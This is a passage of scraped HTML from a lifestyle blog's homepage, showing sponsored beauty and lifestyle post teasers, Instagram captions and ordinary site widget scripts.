wpp_cached_thumb wpp_featured" /></a> <a href="https://jasminemaria.com/2019/04/covergirl-ascension-palette/" title="Smokey Spring Eye Look with COVERGIRL Ascension Palette" class="wpp-post-title" target="_self">Smokey Spring Eye Look with COVERGIRL Ascension Palette</a></li><li> <a href="https://jasminemaria.com/2017/07/how-to-clean-fake-lashes/" title="How to Clean Fake Lashes" target="_self"><img src="https://jasminemaria.com/wp-content/uploads/wordpress-popular-posts/4991-featured-500x500.jpg" width="500" height="500" alt="How to Clean Fake Lashes" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a> <a href="https://jasminemaria.com/2017/07/how-to-clean-fake-lashes/" title="How to Clean Fake Lashes" class="wpp-post-title" target="_self">How to Clean Fake Lashes</a></li><li> <a href="https://jasminemaria.com/2017/07/top-makeup-products-for-oily-skin/" title="Top Makeup Products for Oily Skin" target="_self"><img src="https://jasminemaria.com/wp-content/uploads/wordpress-popular-posts/5311-featured-500x500.png" width="500" height="500" alt="Top Makeup Products for Oily Skin" class="wpp-thumbnail wpp_cached_thumb wpp_featured" /></a> <a href="https://jasminemaria.com/2017/07/top-makeup-products-for-oily-skin/" title="Top Makeup Products for Oily Skin" class="wpp-post-title" target="_self">Top Makeup Products for Oily Skin</a></li></ul></div></section></div></div><div class="featured-widget"><div class="ud-featured"><h3 class="container-title" itemprop="headline"><span>Featured</span></h3><div class="featured-item"><div class="featured-img"><a href="https://jasminemaria.com/2019/05/dove-shower-foam/"><div class="featured-item-img"><img src="https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-1440x1920.jpg" /></div></a></div><div class="featured-info"><div class="featured-info-a"><div class="featured-info-b"> <a class="post-cat" href="https://jasminemaria.com/category/beauty/">Beauty</a> <a href="https://jasminemaria.com/2019/05/dove-shower-foam/"><h4 class="post-title">Spring Self-Care with Dove Shower Foam</h4></a><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">3</span> <span class="rt-label rt-postfix">minutes</span></span> Thanks to Mirium for sponsoring this post. As always, all opinions and thoughts presented are entirely my own. Thanks for supporting the brands that support Jasmine Maria Blog! Springtime is the busiest for me because my boys have baseball, wedding</p><div class="read-more"><a href="https://jasminemaria.com/2019/05/dove-shower-foam/" rel="bookmark">Read More</a></div></div></div></div></div></div></div><div class="site-inner"><div class="wrap"><div class="content-sidebar-wrap"><main class="content" id="genesis-content"><div class="posts-outer single-column"><div class="post-grid"><article class="post-12324 post type-post status-publish format-standard has-post-thumbnail category-beauty category-skincare-products category-sponsored tag-beauty entry" itemscope itemtype="https://schema.org/CreativeWork"><div class="grid-img-outer grid-img-single-column"><a href="https://jasminemaria.com/2019/05/dove-shower-foam/" rel="bookmark"><div class="grid-img"><img src="https://jasminemaria.com/wp-content/uploads/2019/04/Dove-Foam-1-1440x1920.jpg"/></div></a></div><div class="grid-info-single-column"><ul class="grid-meta"><li><a href="https://jasminemaria.com/category/beauty/">Beauty</a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-11T05:00:01-05:00">May 11, 2019</time></li></ul><a href="https://jasminemaria.com/2019/05/dove-shower-foam/" rel="bookmark"><h2 class="entry-title" itemprop="headline">Spring Self-Care with Dove Shower Foam</h2></a><div class="grid-body"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">3</span> <span class="rt-label rt-postfix">minutes</span></span> Thanks to Mirium for sponsoring this post. As always, all opinions and thoughts presented are entirely my own. Thanks for supporting the brands that support Jasmine Maria Blog! Springtime is the busiest for me because my boys have baseball, wedding</p><div class = "read-more"><a href="https://jasminemaria.com/2019/05/dove-shower-foam/" rel="bookmark">Read More</a></div></div></div></article></div><div class="post-grid"><article class="post-12549 post type-post status-publish format-standard has-post-thumbnail category-lifestyle category-sponsored tag-lifestyle entry" itemscope itemtype="https://schema.org/CreativeWork"><div class="grid-img-outer grid-img-single-column"><a href="https://jasminemaria.com/2019/05/quirky-dog-traits-my-dog-has/" rel="bookmark"><div class="grid-img"><img src="https://jasminemaria.com/wp-content/uploads/2019/05/1R9C2987-1440x960.jpg"/></div></a></div><div class="grid-info-single-column"><ul class="grid-meta"><li><a href="https://jasminemaria.com/category/lifestyle/">Lifestyle</a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-10T05:00:00-05:00">May 10, 2019</time></li></ul><a href="https://jasminemaria.com/2019/05/quirky-dog-traits-my-dog-has/" rel="bookmark"><h2 class="entry-title" itemprop="headline">Quirky Dog Traits My Dog Has</h2></a><div class="grid-body"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">3</span> <span class="rt-label rt-postfix">minutes</span></span> Disclosure: This shop has been compensated by Collective Bias, Inc. and its advertiser. All opinions are mine alone. #GrowingUpPurina #CollectiveBias Look who&#8217;s making an appearance today. Today&#8217;s post is all about Hazel. She&#8217;s been in our family since she was</p><div class = "read-more"><a href="https://jasminemaria.com/2019/05/quirky-dog-traits-my-dog-has/" rel="bookmark">Read More</a></div></div></div></article></div><div class="post-grid"><article class="post-12573 post type-post status-publish format-standard has-post-thumbnail category-fashion tag-fashion entry" itemscope itemtype="https://schema.org/CreativeWork"><div class="grid-img-outer grid-img-single-column"><a href="https://jasminemaria.com/2019/05/6-ways-you-can-support-your-blogger-friend/" rel="bookmark"><div class="grid-img"><img src="https://jasminemaria.com/wp-content/uploads/2019/05/DSC0335-1440x2160.jpg"/></div></a></div><div class="grid-info-single-column"><ul class="grid-meta"><li><a href="https://jasminemaria.com/category/lifestyle/fashion/">Fashion</a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-08T20:57:06-05:00">May 8, 2019</time></li></ul><a href="https://jasminemaria.com/2019/05/6-ways-you-can-support-your-blogger-friend/" rel="bookmark"><h2 class="entry-title" itemprop="headline">6 Ways You Can Support Your Blogger Friend</h2></a><div class="grid-body"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">3</span> <span class="rt-label rt-postfix">minutes</span></span> I remember the first time I decided that I was going to become a full-time blogger. I quit my job, Brian was our only income and of course, on top of that, we had 2 boys to support. There were</p><div class = "read-more"><a href="https://jasminemaria.com/2019/05/6-ways-you-can-support-your-blogger-friend/" rel="bookmark">Read More</a></div></div></div></article></div><div class="post-grid"><article class="post-12519 post type-post status-publish format-standard has-post-thumbnail category-beauty category-best-of tag-beauty tag-best-of entry" itemscope itemtype="https://schema.org/CreativeWork"><div class="grid-img-outer grid-img-single-column"><a href="https://jasminemaria.com/2019/05/best-of-elf-cosmetics/" rel="bookmark"><div class="grid-img"><img src="https://jasminemaria.com/wp-content/uploads/2019/05/the-best-of-e.l.f.-cosmetics-pin.jpg"/></div></a></div><div class="grid-info-single-column"><ul class="grid-meta"><li><a href="https://jasminemaria.com/category/beauty/">Beauty</a></li><li><time class="entry-time" itemprop="datePublished" datetime="2019-05-07T05:00:00-05:00">May 7, 2019</time></li></ul><a href="https://jasminemaria.com/2019/05/best-of-elf-cosmetics/" rel="bookmark"><h2 class="entry-title" itemprop="headline">The Best of e.l.f. Cosmetics</h2></a><div class="grid-body"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">5</span> <span class="rt-label rt-postfix">minutes</span></span> It&#8217;s been a while since I&#8217;ve rounded up my favorite products from a specific brand. I love doing these types of posts because I am able to share with you guys what products from that specific brand I truly love</p><div class = "read-more"><a href="https://jasminemaria.com/2019/05/best-of-elf-cosmetics/" rel="bookmark">Read More</a></div></div></div></article></div></div><div class="clearfix"></div><div class="archive-pagination pagination"><ul><li class="active" ><a href="https://jasminemaria.com/" aria-label="Current page" aria-current="page"><span class="screen-reader-text">Page </span>1</a></li><li><a href="https://jasminemaria.com/page/2/"><span class="screen-reader-text">Page </span>2</a></li><li><a href="https://jasminemaria.com/page/3/"><span class="screen-reader-text">Page </span>3</a></li><li class="pagination-omission">&#x02026;</li><li><a href="https://jasminemaria.com/page/160/"><span class="screen-reader-text">Page </span>160</a></li><li class="pagination-next"><a href="https://jasminemaria.com/page/2/" >Next <i class="fa fa-angle-right" aria-hidden="true"></i></a></li></ul></div></main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar" itemscope itemtype="https://schema.org/WPSideBar" id="genesis-sidebar-primary"><h2 class="genesis-sidebar-title screen-reader-text">Primary Sidebar</h2><section id="custom_html-25" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><div class="textwidget custom-html-widget"><div style="text-align:center;"><span id="hover"> <a href="https://jasminemaria.com/about-madison-beauty-lifestyle-blog/"><img id="about-photo" src="https://jasminemaria.com/wp-content/uploads/2019/04/Mothers-Day-Outfit4.jpg" /></a></span><div id="about"> Welcome to Jasmine Maria blog. I'm a beauty + lifetyle blogger in Madison, WI. I'm a mother of two boys, bride to be, makeup artist and fur-mama to 2 chihuahuas.</div></div></div></div></section><section id="minimal-social-icons-9" class="widget minimal-social-icons"><div class="widget-wrap"><h3 class="widgettitle widget-title">follow me</h3><ul class="aligncenter"><li class="ssi-instagram"><a href="https://www.instagram.com/thejasminemaria" ><i class="fa fa-instagram"></i></a></li><li class="ssi-twitter"><a href="https://www.twitter.com/thejasminemaria" ><i class="fa fa-twitter"></i></a></li><li class="ssi-bloglovin"><a href="https://www.bloglovin.com/blogs/jasmine-maria-14935831" ><i class="fa fa-heart"></i></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/thejasminemaria" ><i class="fa fa-pinterest-p"></i></a></li><li class="ssi-facebook"><a href="https://www.facebook.com/thejasminemaria" ><i class="fa fa-facebook"></i></a></li></ul></div></section><section id="null-instagram-feed-10" class="widget null-instagram-feed"><div class="widget-wrap"><h3 class="widgettitle widget-title">@thejasminemaria</h3><ul class="instagram-pics instagram-size-large"><li class=""><a href="//instagram.com/p/Bxcpe15l1vo/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/94ac64991b212c138846d99537e10dc8/5D5D0ADF/t51.2885-15/sh0.08/e35/c0.180.1440.1440/s640x640/59794008_226728088285596_1354466707658597626_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="Today’s outfit! It’s going to be 70° ☀️ so I am able to bust out the romper again. I love this casual romper. Super comfortable and it comes in other colors. ⁣Can be styled with any shoe wear. ⁣ HOW TO SHOP:⁣⁣⁣⁣⁣⁣ 1️⃣Search for “thejasminemaria” on the @liketoknow.it app ⁣⁣⁣⁣⁣⁣⁣⁣ 2️⃣Screenshot this picture and open the LikeToKnow.It app⁣⁣⁣⁣⁣⁣ 3️⃣Type this into your browser: http://liketk.it/2BOeS⁣ ⁣ #amazonfinds #amazonfashion #amazonhaul #liketkit #LTKunder50 #LTKspring #LTKshoecrush #LTKsalealert #LTKstyletip #LTKitbag #momblogger #midwestbloggers #wisconsinblogger #wisconsinbloggers #madisonblogger #flatlaystyle #styleblogger #romper #espradilles #lovelysquares #fashionflatlay #fashionista #realoutfitinstagram" title="Today’s outfit! It’s going to be 70° ☀️ so I am able to bust out the romper again. I love this casual romper. Super comfortable and it comes in other colors. ⁣Can be styled with any shoe wear. ⁣ HOW TO SHOP:⁣⁣⁣⁣⁣⁣ 1️⃣Search for “thejasminemaria” on the @liketoknow.it app ⁣⁣⁣⁣⁣⁣⁣⁣ 2️⃣Screenshot this picture and open the LikeToKnow.It app⁣⁣⁣⁣⁣⁣ 3️⃣Type this into your browser: http://liketk.it/2BOeS⁣ ⁣ #amazonfinds #amazonfashion #amazonhaul #liketkit #LTKunder50 #LTKspring #LTKshoecrush #LTKsalealert #LTKstyletip #LTKitbag #momblogger #midwestbloggers #wisconsinblogger #wisconsinbloggers #madisonblogger #flatlaystyle #styleblogger #romper #espradilles #lovelysquares #fashionflatlay #fashionista #realoutfitinstagram" class=""/></a></li><li class=""><a href="//instagram.com/p/BxZ-KJJFtnJ/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/5b423997663be415b5523197f76ffcdf/5D55D11B/t51.2885-15/sh0.08/e35/c180.0.1080.1080/s640x640/58704292_424957081388410_2079387832404752576_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="[#Sponsored] Spring season is chaotic for me. Not only am I planning my own wedding, but I am also working weddings, taking care of house chores, taking my boys to baseball and getting blog work done. Sometimes I forget that I need to take things slow and just make time for myself. ⁣ ⁣ My favorite way to unwind is by taking a long shower. I saw that @dove has a Relaxing Lavender Shower Foam available @walmart and it’s a great must have to unwind after a busy day. ⁣ ⁣ Read more about it on the blog. [LINK IN BIO]⁣ ⁣ #SuperiorShower #Dove #walmart #thejasminemaria #midwestbloggers #wisconsinbloggers #madisonblogger #beautyroutine #skincareroutine #selfcare #springbeautyroutine #liveauthentic #inspiremyinstagram #mommytime #motherhood #momlife" title="[#Sponsored] Spring season is chaotic for me. Not only am I planning my own wedding, but I am also working weddings, taking care of house chores, taking my boys to baseball and getting blog work done. Sometimes I forget that I need to take things slow and just make time for myself. ⁣ ⁣ My favorite way to unwind is by taking a long shower. I saw that @dove has a Relaxing Lavender Shower Foam available @walmart and it’s a great must have to unwind after a busy day. ⁣ ⁣ Read more about it on the blog. [LINK IN BIO]⁣ ⁣ #SuperiorShower #Dove #walmart #thejasminemaria #midwestbloggers #wisconsinbloggers #madisonblogger #beautyroutine #skincareroutine #selfcare #springbeautyroutine #liveauthentic #inspiremyinstagram #mommytime #motherhood #momlife" class=""/></a></li><li class=""><a href="//instagram.com/p/BxVbWHfFDn2/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/e2d228e1748bff737fa98554b8a9cc51/5D6EA2EF/t51.2885-15/sh0.08/e35/s640x640/59926596_1087387281469268_2541055738619880751_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="Ombré &amp; almond shaped nails. This is new for me. @itsmekelsie22 has been telling me to give it a try and I did. I actually like the shape. It’s definitely different but I 💖it. ⁣ ⁣ Also I am using a new preset called Bright &amp; Bold from @huntersofhappinesspresets. Stay tuned for my stories so I can show you some before &amp; afters. Use code: JASMINE20 for 20% off. ⁣ ⁣ #thejasminemaria #thejasminemarianails #ombrenails #nailsofinstagram #nails #midwestbloggers #wisconsinblogger #madisonblogger #photosinbetween #lovelysquares #springnails #weddingnails #instagramnails #almondshapenails" title="Ombré &amp; almond shaped nails. This is new for me. @itsmekelsie22 has been telling me to give it a try and I did. I actually like the shape. It’s definitely different but I 💖it. ⁣ ⁣ Also I am using a new preset called Bright &amp; Bold from @huntersofhappinesspresets. Stay tuned for my stories so I can show you some before &amp; afters. Use code: JASMINE20 for 20% off. ⁣ ⁣ #thejasminemaria #thejasminemarianails #ombrenails #nailsofinstagram #nails #midwestbloggers #wisconsinblogger #madisonblogger #photosinbetween #lovelysquares #springnails #weddingnails #instagramnails #almondshapenails" class=""/></a></li><li class=""><a href="//instagram.com/p/BxS0nl4FoTr/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/23ab412e231257ed7e6a27a639774ed0/5D6A3EF8/t51.2885-15/sh0.08/e35/c0.180.1440.1440/s640x640/58453610_134757137588095_848427878992585418_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="I still like to dress my boys alike. I always hated when my mom did it with me &amp; my sister but here I am being a hypocrite 🤣. These cute outfits are from @deuxpardeuxkids. They have the cutest clothes kids and this outfit is from their spring collection. #deuxpardeux #deuxpardeuxkids #kidsfashion #momblogger #boymom #momofboys #springkidsfashion #photosinbetween #wisconsinblogger #thejasminemaria #springstyle #wisconsinbloggers" title="I still like to dress my boys alike. I always hated when my mom did it with me &amp; my sister but here I am being a hypocrite 🤣. These cute outfits are from @deuxpardeuxkids. They have the cutest clothes kids and this outfit is from their spring collection. #deuxpardeux #deuxpardeuxkids #kidsfashion #momblogger #boymom #momofboys #springkidsfashion #photosinbetween #wisconsinblogger #thejasminemaria #springstyle #wisconsinbloggers" class=""/></a></li></ul><p class="clear"><a href="//instagram.com/thejasminemaria/" rel="me" target="_blank" class="">@thejasminemaria</a></p></div></section><section id="search-27" class="widget widget_search"><div class="widget-wrap"><h3 class="widgettitle widget-title">search jasminemaria.com</h3><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://jasminemaria.com/" role="search"><label class="search-form-label screen-reader-text" for="searchform-5cdd6900a9ca92.28445634">Search</label><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cdd6900a9ca92.28445634" placeholder="Search"><input class="search-form-submit" type="submit" value="&#xf002;"><meta itemprop="target" content="https://jasminemaria.com/?s={s}"></form></div></section><section id="mailerlite_widget-29" class="widget widget_mailerlite_widget"><div class="widget-wrap"><script type="text/javascript" src="https://app.mailerlite.com/data/webforms/990898/s3c4s8.js?v=1558014208"></script></div></section><section id="custom_html-48" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><h3 class="widgettitle widget-title">LikeToKnow.It</h3><div class="textwidget custom-html-widget"><div id="ltkwidget-version-two923180669" data-appid="923180669" class="ltkwidget-version-two"><script>var rsLTKLoadApp="0",rsLTKPassedAppID="923180669";</script><script type="text/javascript" src="//widgets-static.rewardstyle.com/widgets2_0/client/pub/ltkwidget/ltkwidget.js"></script><div widget-dashboard-settings="" data-appid="923180669" data-userid="243708" data-rows="2" data-cols="2" data-showframe="false" data-padding="4" data-profileid="4b2308fa-93e0-11e6-9fed-0242ac110002"><div class="rs-ltkwidget-container"><div ui-view=""></div></div></div><noscript>This content requires JavaScript to be enabled, and the site or browser may be disabling it. Try reactivating it to view this content.</noscript></div></div></div></section><section id="featured-post-52" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">Featured</h3><article class="post-2253 post type-post status-publish format-standard has-post-thumbnail category-lifestyle category-monthly-goals tag-lifestyle entry"><a href="https://jasminemaria.com/2016/03/march-goals/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="800" height="850" src="https://jasminemaria.com/wp-content/uploads/2016/03/march-goals-800x850.jpg" class="entry-image attachment-post" alt="March Goals" itemprop="image" /></a><header class="entry-header"><h4 class="entry-title" itemprop="headline"><a href="https://jasminemaria.com/2016/03/march-goals/">March Goals</a></h4></header><div class="entry-content"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">2</span> <span class="rt-label rt-postfix">minutes</span></span> Hello March.&nbsp; I can&#8217;t believe it&#8217;s March already before you know it, it&#8217;s going to be Spring. Which I&#8217;m totally okay with because I&#8217;m so over the snow. We had warm weather this weekend and now we have snow (again!).&nbsp;</p></div></article><article class="post-6012 post type-post status-publish format-standard has-post-thumbnail category-lifestyle category-reviews entry"><a href="https://jasminemaria.com/2017/10/tomorrow-sleep-review/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="810" height="850" src="https://jasminemaria.com/wp-content/uploads/2017/10/IMG_7501-810x850.jpg" class="entry-image attachment-post" alt="Tomorrow Sleep Review" itemprop="image" /></a><header class="entry-header"><h4 class="entry-title" itemprop="headline"><a href="https://jasminemaria.com/2017/10/tomorrow-sleep-review/">Tomorrow Sleep Review</a></h4></header><div class="entry-content"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">3</span> <span class="rt-label rt-postfix">minutes</span></span> Disclosure – Tomorrow Sleep products have been provided for consideration for a review.&nbsp;All opinions and results expressed in this article are 100% my own. Want to know something? And this is me being honest. My old mattress was over 10</p></div></article><article class="post-6517 post type-post status-publish format-standard has-post-thumbnail category-lifestyle category-sponsored tag-lifestyle entry"><a href="https://jasminemaria.com/2017/11/home-essentials-winter/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="700" height="850" src="https://jasminemaria.com/wp-content/uploads/2017/11/home-essentials-700x850.jpg" class="entry-image attachment-post" alt="Home Essentials for the Winter" itemprop="image" /></a><header class="entry-header"><h4 class="entry-title" itemprop="headline"><a href="https://jasminemaria.com/2017/11/home-essentials-winter/">Home Essentials for the Winter</a></h4></header><div class="entry-content"><p><span class="rt-reading-time" style="display: block;"><span class="rt-label">Reading Time: </span> <span class="rt-time">2</span> <span class="rt-label rt-postfix">minutes</span></span> &nbsp; &nbsp; &nbsp; Tis&#8217; the season for a runny nose. And trust me when I say this, my home has gotten hit already with a cold. First, it was Landon, then me, then Rylan and now Brian has it. THE</p></div></article></div></section><section id="custom_html-50" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><div class="textwidget custom-html-widget"><a target="_blank" href="https://shareasale.com/r.cfm?b=1286819&amp;u=1184865&amp;m=17025&amp;urllink=&amp;afftrack=" rel="noopener noreferrer"><img src="https://static.shareasale.com/image/17025/Minted_SaveTheDates_00.jpg" border="0" /></a> <a href="https://www.siteground.com/web-hosting.htm?afbannercode=7a6db074c0a7a8c8969effdadb057c02"><img src="https://ua.siteground.com/img/banners/general/dynamic-price/250x250.jpg" alt="Web Hosting" width="250" height="250" border="0"></a> <a href="https://numeusa.com/curling-wands?ref=jasminevargas" target="_BLANK" rel="nofollow noopener noreferrer"><img src="https://static.tapfiliate.com/5c939aa2bdb74.jpg?a=46421-774fed&s=473597-8ca17c" border="0"></a></div></div></section></aside></div><noscript><iframe height="0" src="//www.googletagmanager.com/ns.html?id=GTM-M4D4D3" style="display:none;visibility:hidden" width="0"></iframe></noscript><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-M4D4D3');</script></div></div><div class="footer-area-one"><div class="wrap"><section id="latest-videos-3" class="widget latest-videos"><div class="widget-wrap"><h4 class="widget-title widgettitle">Latest on the channel</h4> <script>(function ($) { function getVideos(b) { $.ajax({ url: "https://www.googleapis.com/youtube/v3/playlistItems", type: "GET", dataType: "json", data: { part: "snippet", playlistId: b, chart: "mostPopular", maxResults: 3, key: "AIzaSyAHCDz6bwlVFdnuX19FMFJKoIjq_5baFII" }, success: function (c) { var a; for (a = 0; 3 > a; a++) { var d = $(), e = $("<img>").attr("src", c.items[a].snippet.thumbnails.medium.url), b = "https://www.youtube.com/watch?v=" + c.items[a].snippet.resourceId.videoId, e = $("<a target='_blank'>").attr("href", b).append( $("<div class='ud-image' style='background-image:url(" + c.items[a].snippet.thumbnails.medium.url + ")'>").append(e, '<div class="ud-ytplay"><div class="info-a"><div class="info-b"><i aria-hidden="true" class="fa fa-youtube-play"></i></div></div></div>') ), d = $("<div class='ud-video'>").append(e, d); $("#ud-feed1027942498").append(d); } } }); } jQuery(document).ready(function () { var ytusername = document.getElementById('youtube-id1027942498'); if (ytusername) { var username = ytusername.innerHTML; $.ajax({ url: "https://www.googleapis.com/youtube/v3/channels", type: "GET", dataType: "json", data: { part: "contentDetails", id: username, key: "AIzaSyAHCDz6bwlVFdnuX19FMFJKoIjq_5baFII" }, success: function (data) { var uploads = data.items[0].contentDetails.relatedPlaylists.uploads; getVideos(uploads); } }); } }); })(jQuery);</script> <div id="ud-feed1027942498"><div id="youtube-id1027942498" style="display:none">UC9N7eBuZWreep4XAbK-1o-g</div></div></div></section></div></div><div class="insta-footer"><section id="null-instagram-feed-9" class="widget null-instagram-feed"><div class="widget-wrap"><h4 class="widget-title widgettitle">@thejasminemaria</h4><ul class="instagram-pics instagram-size-large"><li class=""><a href="//instagram.com/p/Bxcpe15l1vo/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/94ac64991b212c138846d99537e10dc8/5D5D0ADF/t51.2885-15/sh0.08/e35/c0.180.1440.1440/s640x640/59794008_226728088285596_1354466707658597626_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="Today’s outfit! It’s going to be 70° ☀️ so I am able to bust out the romper again. I love this casual romper. Super comfortable and it comes in other colors. ⁣Can be styled with any shoe wear. ⁣ HOW TO SHOP:⁣⁣⁣⁣⁣⁣ 1️⃣Search for “thejasminemaria” on the @liketoknow.it app ⁣⁣⁣⁣⁣⁣⁣⁣ 2️⃣Screenshot this picture and open the LikeToKnow.It app⁣⁣⁣⁣⁣⁣ 3️⃣Type this into your browser: http://liketk.it/2BOeS⁣ ⁣ #amazonfinds #amazonfashion #amazonhaul #liketkit #LTKunder50 #LTKspring #LTKshoecrush #LTKsalealert #LTKstyletip #LTKitbag #momblogger #midwestbloggers #wisconsinblogger #wisconsinbloggers #madisonblogger #flatlaystyle #styleblogger #romper #espradilles #lovelysquares #fashionflatlay #fashionista #realoutfitinstagram" title="Today’s outfit! It’s going to be 70° ☀️ so I am able to bust out the romper again. I love this casual romper. Super comfortable and it comes in other colors. ⁣Can be styled with any shoe wear. ⁣ HOW TO SHOP:⁣⁣⁣⁣⁣⁣ 1️⃣Search for “thejasminemaria” on the @liketoknow.it app ⁣⁣⁣⁣⁣⁣⁣⁣ 2️⃣Screenshot this picture and open the LikeToKnow.It app⁣⁣⁣⁣⁣⁣ 3️⃣Type this into your browser: http://liketk.it/2BOeS⁣ ⁣ #amazonfinds #amazonfashion #amazonhaul #liketkit #LTKunder50 #LTKspring #LTKshoecrush #LTKsalealert #LTKstyletip #LTKitbag #momblogger #midwestbloggers #wisconsinblogger #wisconsinbloggers #madisonblogger #flatlaystyle #styleblogger #romper #espradilles #lovelysquares #fashionflatlay #fashionista #realoutfitinstagram" class=""/></a></li><li class=""><a href="//instagram.com/p/BxZ-KJJFtnJ/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/5b423997663be415b5523197f76ffcdf/5D55D11B/t51.2885-15/sh0.08/e35/c180.0.1080.1080/s640x640/58704292_424957081388410_2079387832404752576_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="[#Sponsored] Spring season is chaotic for me. Not only am I planning my own wedding, but I am also working weddings, taking care of house chores, taking my boys to baseball and getting blog work done. Sometimes I forget that I need to take things slow and just make time for myself. ⁣ ⁣ My favorite way to unwind is by taking a long shower. I saw that @dove has a Relaxing Lavender Shower Foam available @walmart and it’s a great must have to unwind after a busy day. ⁣ ⁣ Read more about it on the blog. [LINK IN BIO]⁣ ⁣ #SuperiorShower #Dove #walmart #thejasminemaria #midwestbloggers #wisconsinbloggers #madisonblogger #beautyroutine #skincareroutine #selfcare #springbeautyroutine #liveauthentic #inspiremyinstagram #mommytime #motherhood #momlife" title="[#Sponsored] Spring season is chaotic for me. Not only am I planning my own wedding, but I am also working weddings, taking care of house chores, taking my boys to baseball and getting blog work done. Sometimes I forget that I need to take things slow and just make time for myself. ⁣ ⁣ My favorite way to unwind is by taking a long shower. I saw that @dove has a Relaxing Lavender Shower Foam available @walmart and it’s a great must have to unwind after a busy day. ⁣ ⁣ Read more about it on the blog. [LINK IN BIO]⁣ ⁣ #SuperiorShower #Dove #walmart #thejasminemaria #midwestbloggers #wisconsinbloggers #madisonblogger #beautyroutine #skincareroutine #selfcare #springbeautyroutine #liveauthentic #inspiremyinstagram #mommytime #motherhood #momlife" class=""/></a></li><li class=""><a href="//instagram.com/p/BxVbWHfFDn2/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/e2d228e1748bff737fa98554b8a9cc51/5D6EA2EF/t51.2885-15/sh0.08/e35/s640x640/59926596_1087387281469268_2541055738619880751_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="Ombré &amp; almond shaped nails. This is new for me. @itsmekelsie22 has been telling me to give it a try and I did. I actually like the shape. It’s definitely different but I 💖it. ⁣ ⁣ Also I am using a new preset called Bright &amp; Bold from @huntersofhappinesspresets. Stay tuned for my stories so I can show you some before &amp; afters. Use code: JASMINE20 for 20% off. ⁣ ⁣ #thejasminemaria #thejasminemarianails #ombrenails #nailsofinstagram #nails #midwestbloggers #wisconsinblogger #madisonblogger #photosinbetween #lovelysquares #springnails #weddingnails #instagramnails #almondshapenails" title="Ombré &amp; almond shaped nails. This is new for me. @itsmekelsie22 has been telling me to give it a try and I did. I actually like the shape. It’s definitely different but I 💖it. ⁣ ⁣ Also I am using a new preset called Bright &amp; Bold from @huntersofhappinesspresets. Stay tuned for my stories so I can show you some before &amp; afters. Use code: JASMINE20 for 20% off. ⁣ ⁣ #thejasminemaria #thejasminemarianails #ombrenails #nailsofinstagram #nails #midwestbloggers #wisconsinblogger #madisonblogger #photosinbetween #lovelysquares #springnails #weddingnails #instagramnails #almondshapenails" class=""/></a></li><li class=""><a href="//instagram.com/p/BxS0nl4FoTr/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/23ab412e231257ed7e6a27a639774ed0/5D6A3EF8/t51.2885-15/sh0.08/e35/c0.180.1440.1440/s640x640/58453610_134757137588095_848427878992585418_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="I still like to dress my boys alike. I always hated when my mom did it with me &amp; my sister but here I am being a hypocrite 🤣. These cute outfits are from @deuxpardeuxkids. They have the cutest clothes kids and this outfit is from their spring collection. #deuxpardeux #deuxpardeuxkids #kidsfashion #momblogger #boymom #momofboys #springkidsfashion #photosinbetween #wisconsinblogger #thejasminemaria #springstyle #wisconsinbloggers" title="I still like to dress my boys alike. I always hated when my mom did it with me &amp; my sister but here I am being a hypocrite 🤣. These cute outfits are from @deuxpardeuxkids. They have the cutest clothes kids and this outfit is from their spring collection. #deuxpardeux #deuxpardeuxkids #kidsfashion #momblogger #boymom #momofboys #springkidsfashion #photosinbetween #wisconsinblogger #thejasminemaria #springstyle #wisconsinbloggers" class=""/></a></li><li class=""><a href="//instagram.com/p/BxSHe4fF4ng/" target="_blank" class=""><img 